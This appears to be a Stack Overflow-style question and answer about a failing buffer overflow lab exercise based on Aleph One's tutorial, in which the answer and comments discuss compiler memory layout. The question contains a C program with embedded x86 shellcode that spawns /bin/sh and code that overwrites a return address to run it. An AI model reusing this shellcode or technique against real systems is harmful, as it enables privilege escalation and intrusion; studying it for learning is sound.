1

I've been doing buffer overflow test, mostly I read from Aleph One's Smashing The Stack For Fun And Profit.

#include<string.h>
#include<stdio.h>

char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0
\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x8\x8d\x53\x0c\xcd\x80\xe8
\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x58\x58\x58\x58
\x59\x59\x59\x59";

char large_str[104]; /*length equals to buffer + i + ptr + return_address*/

int main(){
    char buffer[56];/*same length as shellcode*/
    int i;
    long *ptr=(long*)large_str;

    memset(&large_str,0,104); /*initialize large_str*/
    for(i=0;i<24;i++)
            *(ptr+i)=(int)buffer; /*overwrite return address*/

    for(i=0;i<strlen(shellcode);i++)
            large_str[i]=shellcode[i];



    strcpy(buffer,large_str); /*doing overflow*/
    return 0;
}

doing

$gcc -o overflow -fno-stack-protector overflow.c
$./overflow
segmentation fault (core dumped)

Before doing this, I've turned random address off already. Also, I've tested my shellcode in program:

int main(int argc, char **argv)
{
    int (*func)();
    func=(int(*)())code;
    (int)(*func)();
}

it works. so I don't know what's wrong with my buffer overflow code, is there anyone who's got experience with buffer overflow lab? I debugged with gdb, it seems I didn't over write return address properly.

Improve this question
1
  • removed the unrelated kernel and stack overflow tags. don't confuse concepts! Commented Nov 26, 2016 at 9:42

1 Answer 1

Reset to default
3

Your code makes assumptions on where stuff like buffer will be in memory.

And what was valid for a set of compilers in 1996, from when your article is, is simply not true anymore, 20 years later in 2016.

This has nothing to do with stack protection, or address layout randomization. It's simply that there's no reason the compiler should put the return address pointer right after your large_str – the compiler isn't stupid and sees that buffer is allocated in main, anyways, so it will just pick any location that seems convenient in memory to store buffer. And there's absolutely no reason to assume that this is

  1. on the stack to begin with (why should it? The compiler knows its lifetime, so it could as well be anywhere), see stack and heap are not what you think.
  2. The memory layout will be return pointer – large_str – anything else. There's nothing that defines that. And there shouldn't be. It's a choice to be made by the compiler, and frankly, it probably won't make the same choice as you.
Improve this answer
Sign up to request clarification or add additional context in comments.

5 Comments

I don't quite understand, I traced stack pointer in gdb, the return address is stored in 0x7fffffffdeb0, then frame base pointer in 0x7fffffffdea8, then i in 0x7fffffffde9c, then ptr in 0x7fffffffde90, finally buffer in 0x7fffffffde50.
well, but you say yourself gdb shows that 0x7fffffffdeb0 isn't properly overwritten. See the contradiction here?
that's why I set my large_str and buffer size. Actually I just want to understand deeply about how program and kernel works by doing this buffer overflow. Do you have any other recommend? Thank you so much!
The kernel isn't involved here at all.
Yes.....so why is it? Is gdb tell something wrong or program works in another approach?

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.